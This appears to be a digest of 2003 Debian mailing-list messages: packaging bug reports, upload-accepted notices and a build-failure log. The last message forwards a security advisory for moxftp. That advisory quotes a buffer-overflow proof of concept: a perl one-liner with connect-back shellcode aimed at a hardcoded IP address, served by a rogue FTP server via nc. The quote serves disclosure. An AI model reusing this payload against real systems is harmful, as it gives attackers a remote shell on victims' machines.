Bug#187402: webbase-doc: postinst failure in install-info
Package: webbase-doc Version: 5.17.0-18 Severity: serious Hi, here is the problem: Setting up webbase-doc (5.17.0-18) ... No `START-INFO-DIR-ENTRY' and no `This file documents'. install-info(/usr/share/info/webbase.info): unable to determine description for `dir' entry - giving up dpkg: error processing webbase-doc (--configure): -- System Information: Debian Release: testing/unstable Architecture: i386 Kernel: Linux irancy 2.4.20-k7 #2 Sun Dec 1 13:41:25 EST 2002 i686 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] -- no debconf information
mergelog_4.5.1-3_i386.changes ACCEPTED
Accepted: mergelog_4.5.1-3.diff.gz to pool/main/m/mergelog/mergelog_4.5.1-3.diff.gz mergelog_4.5.1-3.dsc to pool/main/m/mergelog/mergelog_4.5.1-3.dsc mergelog_4.5.1-3_i386.deb to pool/main/m/mergelog/mergelog_4.5.1-3_i386.deb Announcing to debian-devel-changes@lists.debian.org Thank you for your contribution to Debian.
catalog_1.03-7_i386.changes ACCEPTED
Accepted: catalog_1.03-7.diff.gz to pool/main/c/catalog/catalog_1.03-7.diff.gz catalog_1.03-7.dsc to pool/main/c/catalog/catalog_1.03-7.dsc catalog_1.03-7_all.deb to pool/main/c/catalog/catalog_1.03-7_all.deb Announcing to debian-devel-changes@lists.debian.org Thank you for your contribution to Debian.
catalog override disparity
There are disparities between your recently accepted upload and the override file for the following file(s): catalog_1.03-7_all.deb: package says priority is optional, override says extra. Either the package or the override file is incorrect. If you think the override is correct and the package wrong please fix the package so that this disparity is fixed in the next upload. If you feel the override is incorrect then please reply to this mail and explain why. [NB: this is an automatically generated mail; if you replied to one like it before and have not received a response yet, please ignore this mail. Your reply needs to be processed by a human and will be in due course, but until then the installer will send these automated mails; sorry.] -- Debian distribution maintenance software (This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED])
Bug#187473: FTBFS: header file missing?
Package: webbase Version: 5.17.0-18 Severity: important Automatic build of webbase_5.17.0-18 on aahz by sbuild/m68k 1.170 [...] ** Using build dependencies supplied by package: Build-Depends: debhelper (>> 4.0.0), mysql-client, libmysqlclient10-dev, libz-dev, liburi-dev, apache, libmifluz0-dev, debconf, flex, libunac1-dev, po-debconf, autotools-dev ** Filtered missing central deps that are dependencies of or provide build-deps: zlib1g-dev (>= 1:1.1.4) Warning: The following central src deps are (probably) missing: mifluz-dev [...] checking if mifluz is wanted... yes checking if zlib is wanted... yes checking for inflateEnd in -lz... (cached) yes checking for zlib.h... (cached) yes checking for main in -lmifluz... yes checking for mifluz.h... configure: error: header not found check config.log make: *** [configure-stamp] Error 1 The last lines from config.log: configure:5170: checking for main in -lmifluz configure:5185: c++ -o conftest -g -O2 -Wall -I/usr/include/mysql -L/usr/lib conftest.C -lmifluz -lz -lmysqlclient -lz -luri -lm -lnsl 1>&5 configure:5217: checking for mifluz.h configure:5227: c++ -E -I/usr/include/mysql conftest.C >/dev/null 2>conftest.out In file included from /usr/include/c++/3.2/backward/iostream.h:31, from /usr/include/mifluz/htString.h:20, from /usr/include/mifluz/Dictionary.h:22, from /usr/include/mifluz/Configuration.h:104, from /usr/include/mifluz/WordContext.h:55, from /usr/include/mifluz.h:86, from configure:5223: /usr/include/c++/3.2/backward/backward_warning.h:32:2: warning: #warning This file includes at least one deprecated or antiquated header. Please consider using one of the 32 headers found in section 1 7.4.1.2 of the C++ standard. Examples include substituting the header for the header for C ++ includes, or instead of the deprecated header . To disable this warning us e -Wno-deprecated. configure: failed program was: #line 5222 "configure" #include "confdefs.h" #include Full build-log at: http://buildd.debian.org/fetch.php?&pkg=webbase&ver=5.17.0-18&arch=m68k&stamp=1049349921&file=log&as=raw Christian
Bug#187481: moxftp arbitrary code execution poc/advisory
Package: moxftp Version: 2.2-18 Severity: grave Tags: security Unfortunately I am currently unable to discover the real problem behind this potential exploit. I'm not even sure if it works on Linux. FreeBSD people simply marked this package FORBIDDEN, but didn't fix the problem either. *sigh* Regards, Joey Knud Erik Højgaard wrote: > Attached document explains all. > > This document is also available from http://kokanins.homepage.dk > > -- > Knud > I. BACKGROUND > > According to the vendor moxftp is a "Ftp shell under X Window System". > /usr/ports/ftp/moxftp > > II. DESCRIPTION > > Insufficient bounds checking leads to execution of arbitrary code. > > III. ANALYSIS > > Upon parsing the '220 welcome to server' ftp banner a buffer can be > overrun, allowing us to execute our arbitrary code. The buffer may be > constructed as such: [508 bytes][ebp ][eip ][nops][shellcode]. Placing > the nops and shellcode in the buffer before ebp seems to cause some > problems, luckily there's plenty of space after eip. > > Example run: > > $ perl -e 'print "220 " . "\x90" x 508 . "\x48\xfa\xbf\xbf" x 2 . "\x90" x > 100 . > "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xd9\x9d\x02\x24\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80" > .. "\n"' > file > # nc -l -p 21 < file > > This sets up a rogue server which will overflow the buffer, and execute > the shellcode. The shellcode is connect-back to 217.157.2.36 port 1, > replace "\xd9\x9d\x02\x24" with a suitable ip for testing. > > IV. DETECTION > > moxftp-2.2 shipping with the FreeBSD ports system as well as from > various webpages per 9/2-03 is vulnerable. > > V. WORKAROUND > > unknown > > VI. VENDOR FIX > > unknown > > VII. CVE INFORMATION > > unknown > > VIII. DISCLOSURE TIMELINE > > unknown > > IX. CREDIT > > Knud Erik H?jgaard > -- Life is too short to run proprietary software. -- Bdale Garbee Please always Cc to me when replying to me on the lists.
